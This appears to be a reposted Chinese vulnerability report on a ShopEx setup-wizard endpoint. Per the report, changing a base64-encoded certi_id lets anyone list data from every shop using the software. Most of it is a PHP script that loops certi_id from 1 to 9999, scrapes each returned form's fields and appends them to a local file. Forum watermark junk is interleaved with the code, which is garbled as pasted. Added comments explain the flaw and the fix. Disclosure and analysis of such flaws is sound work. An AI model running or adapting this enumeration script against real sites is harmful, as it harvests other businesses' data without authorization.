|
|
简要描述:
ShopEx某接口缺陷,可遍历所有网站
详细说明:
问题出现在shopex 网店使用向导页面

http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=

refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}

我们修改certi_id 即可遍历所有使用了ShopEx程序的网站

6 [8 T2 m. l- k0 R& v<?php
// NOTE(review): this listing was pasted with forum watermark text interleaved
// with the code (the "6 Y# F, i." style runs). As shown it is not valid PHP;
// the lines are kept verbatim here and only comments are added.
//
// Driver loop: requests the setup-wizard page once per certi_id, 1..9999,
// from a single client with no delay, no rate limit and no credentials of any
// kind. Each response that echoes the refer back is scraped and appended to
// c:/shopEx.txt by ShowshopExD(). The defect the report describes is
// server-side (step2.php accepting whatever certi_id the refer carries), not
// anything in this loop; on the server it shows up as one client walking
// step2.php with thousands of sequential certi_id values.
6 Y# F, i. d: g* }! T6 |. f# d) W9 m% E' r. m4 x
for ($i=1; $i < 10000; $i++) { // enumerate certi_id 1..9999
* ~0 N v# Y- X ShowshopExD($i);
2 Y9 b: `0 a7 o o
0 o9 I" p- m# c j. X) V# H }) v7 T9 J1 r" ~$ J/ o9 U) e; x
9 A0 u1 X6 m7 i, E7 p5 _
/**
 * Fetch the ShopEx setup-wizard page (step2.php) for one certi_id and dump the
 * name/value pairs of the pre-filled <input type="text"> fields it returns.
 *
 * The only value that selects which shop's data comes back is the integer
 * certi_id inside the base64-encoded "refer" JSON; callback_url is a fixed
 * dummy. Whether the server ties certi_id to the requester is what the report
 * disputes. The fix belongs in step2.php: bind certi_id to an authenticated
 * session or to a server-signed refer token. Base64, or any other reversible
 * encoding of the refer, is not an authorization check.
 *
 * NOTE(review): forum watermark text is interleaved with the code below; the
 * lines are kept as pasted and only comments are added.
 *
 * @param int|string $cid  certi_id to request; coerced with intval()
 * @return void  results are echoed and appended to c:/shopEx.txt
 */
function ShowshopExD($cid) {
5 f9 k- |6 t" j7 A
# [- ]" E9 y! [) ~/ I $url='http://guide.ecos.shopex.cn/step2.php';- L/ o# l5 X% G( v7 [6 E! C
9 T+ v4 E' w" _: G1 i
// refer is plain base64 of a JSON object; certi_id is the tenant selector,
// callback_url is a constant placeholder.
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');6 ^( n& D0 M8 u P4 p9 J* R- c
$ h$ t) S1 s; l0 R; d; [
$url = $url.'?refer='.$refer;7 o& b. E6 @, {3 C- g% X
8 A7 v3 I7 Z2 J" e/ l $ch = curl_init($url);/ K2 C1 N7 N$ D9 I1 s6 p) i
2 _% Z* ~# L% K6 \7 x; Y, }
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
: v% D! s5 R6 S: C' o
" J1 s8 R$ ~' D* {3 b curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;8 E0 n; s4 m( I8 J" M1 `4 ~( R
// No cookie, header or auth option is set on the handle: the request is
// anonymous. curl_exec() returning false is not checked.
7 C; E1 ~- T$ x3 C4 P, w $result = curl_exec($ch); X3 w" W( i1 I" i6 N
& X4 o# V* T) Q/ n5 w* D8 W! n
// Response is re-encoded UTF-8 -> gb2312 before matching and output.
$result = mb_convert_encoding($result, "gb2312", "UTF-8");
; G( L3 Q) ^ }9 d1 e4 D; W. a- ^6 w, C6 f% w+ H, ~
// Crude "did the wizard accept this refer" test: the refer string echoed back
// in the page body. strpos() is used for its truthiness, not compared with
// false.
if(strpos($result,$refer))0 J' a/ L+ p) I0 o7 [
+ c a. S' S) G& A
{+ z7 D9 i6 \4 d
H$ ^3 G& L2 z6 J) s* q$ W $fp = fopen("c:/shopEx.txt",'ab'); // append results to c:/shopEx.txt; handle not checked for false
, @9 W* s" r# Q3 m% J4 v0 E
// Pull every self-closing text input out of the page, then name/value out of
// each one. $res[1][0] / $res[3][0] are read without checking that the inner
// regex matched.
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
0 F5 O& G1 M: l4 W- o6 d9 l# \5 ~1 a: U3 V5 N' d. ]* c) Z6 l
foreach ($value[1] as $key) {$ c$ j, h2 B7 r: R7 r: }! b3 ]
, \0 `6 J4 ?" h
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
, V1 L) N1 }+ F% ]2 J1 S
8 V; t# d5 m! s. i! [8 j, h" U0 }" p echo $res[1][0].':'.$res[3][0]."\r\n";+ T5 s. Z, q* T, T3 D
; w) M- _2 z0 E $col =$res[1][0].':'.$res[3][0]."\r\n"; ; D, ]+ \( d/ T/ c! R: L
9 ~. w2 M7 q+ k" g
fwrite($fp, $col, strlen($col)); 8 D: N f: N1 h; e
7 N% |0 F! i5 ~# X5 A
}9 ]$ F3 Z# D4 a
5 I' o; G8 D/ p. Q9 p& n# S
echo '--------------------------------'."\r\n";
+ E7 [' s* M7 u) p: b4 e" r4 W2 j$ ?, t3 T0 b* C" v2 Q
fclose($fp);
5 j/ T$ @2 j, `6 f/ \: N8 d% { Y6 I9 j8 e! R. \
}- T. w- F: \9 A( L- n
, p; b, z; d" r
// Output is flushed per certi_id so progress is visible while the loop runs.
flush();! {7 \5 C. q; O1 k; M
. L9 j$ s2 i* z8 M curl_close($ch);8 B$ K2 p% ]2 F3 |, n4 c
7 Z( K7 i" n# V. u7 { }' }; G6 B4 q# z" K8 I' D8 E
( @! L+ X$ _ [3 i5 |?>
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
refer换成其他加密方式
|
|